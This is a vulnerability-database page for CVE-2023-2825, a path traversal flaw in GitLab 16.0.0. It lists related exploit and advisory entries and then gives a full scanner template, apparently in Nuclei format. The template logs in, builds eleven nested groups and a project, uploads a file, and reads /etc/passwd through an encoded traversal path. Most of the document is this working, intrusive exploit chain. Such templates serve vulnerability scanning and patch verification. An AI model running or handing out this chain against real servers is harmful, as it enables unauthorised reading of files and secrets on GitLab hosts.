| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for Path Traversal in Gitlab | 20 Jun 2024 20:22 | – | githubexploit |
| Exploit for Path Traversal in Gitlab | 30 May 2023 07:03 | – | githubexploit |
| Exploit for Path Traversal in Gitlab | 25 May 2023 13:25 | – | githubexploit |
| CVE-2023-2825 | 26 May 2023 21:15 | – | attackerkb |
| The vulnerability of the Git-based software platform for collaborative code development on GitLab arises from an incorrect limitation on the path name for the restricted access directory. This allows a malicious actor to gain unauthorized access to protected information. | 25 May 2023 00:00 | – | bdu_fstec |
| CVE-2023-2825 | 24 May 2023 19:32 | – | circl |
| GitLab Path Traversal Vulnerability | 24 May 2023 00:00 | – | cnnvd |
| GitLab CE/EE Path Traversal Vulnerability | 26 May 2023 00:00 | – | cnvd |
| Directory Traversal Vulnerability in GitLab CE/EE | 29 May 2023 00:00 | – | cnvd |
| CVE-2023-2825 | 26 May 2023 00:00 | – | cve |

```yaml
id: CVE-2023-2825

info:
  name: GitLab 16.0.0 - Path Traversal
  author: DhiyaneshDk,rootxharsh,iamnoooob,pdresearch
  severity: high
  description: |
    An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups
  impact: |
    Authenticated attackers can exploit path traversal vulnerabilities to read arbitrary files from GitLab 16.0.0 servers when attachments exist in public projects nested within at least five groups.
  remediation: |
    Upgrade GitLab to a version that is not affected by the path traversal vulnerability (CVE-2023-2825).
  reference:
    - https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/
    - https://github.com/Occamsec/CVE-2023-2825
    - https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2825
    - https://gitlab.com/gitlab-org/cves/-/blob/master/2023/CVE-2023-2825.json
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-2825
    cwe-id: CWE-22
    epss-score: 0.71641
    epss-percentile: 0.99341
    cpe: cpe:2.3:a:gitlab:gitlab:16.0.0:*:*:*:community:*:*:*
  metadata:
    verified: true
    max-request: 16
    vendor: gitlab
    product: gitlab
    shodan-query:
      - title:"Gitlab"
      - cpe:"cpe:2.3:a:gitlab:gitlab"
      - http.title:"gitlab"
    fofa-query: title="gitlab"
    google-query: intitle:"gitlab"
  tags: cve2023,cve,gitlab,lfi,authenticated,intrusive,vuln

variables:
  data: "{{rand_base(5)}}"

http:
  - raw:
      - |
        GET /users/sign_in HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /users/sign_in HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: */*

        user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: */*

        group%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        @timeout: 15s
        POST /projects HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        project%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}}
      - |
        POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        X-CSRF-Token: {{x-csrf-token}}
        Content-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6

        --0ce2a9fbe06b6da89c138a35a1765ed6
        Content-Disposition: form-data; name="file"; filename="{{randstr}}"

        {{randstr}}
        --0ce2a9fbe06b6da89c138a35a1765ed6--
      - |
        GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    host-redirects: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 726f6f743a78
        encoding: hex

      - type: word
        part: header
        words:
          - application/octet-stream
          - etc%2Fpasswd
        condition: and

    extractors:
      - type: regex
        name: token_1
        group: 1
        regex:
          - name="authenticity_token" value="([A-Za-z0-9_-]+)"
        internal: true
        part: body

      - type: regex
        name: token_2
        group: 1
        regex:
          - name="csrf\-token" content="([A-Z_0-9a-z-]+)"
        internal: true
        part: body

      - type: regex
        name: parent_id
        group: 1
        regex:
          - href="\/groups\/new\?parent_id=([0-9]+)
        internal: true
        part: body

      - type: regex
        name: namespace_id
        group: 1
        regex:
          - ref="\/projects\/new\?namespace_id=([0-9]+)
        internal: true
        part: body

      - type: regex
        name: x-csrf-token
        group: 1
        regex:
          - const headers = \{"X\-CSRF\-Token":"([a-zA-Z-0-9_]+)"
        internal: true
        part: body

      - type: regex
        name: upload-hash
        group: 1
        regex:
          - '"url":"\/uploads\/([0-9a-z]+)\/'
        internal: true
        part: body
# digest: 4a0a0047304502200fafff50b065860e29e36641b9c3d98f6fcc7f3562548c2c6cf8b3348c9f227202210097fffa68731e96a1fbb45db3cbe341c790918d63f75f55b6fbb621160d716743:922c64590222798bb761d5b6d8e72950
```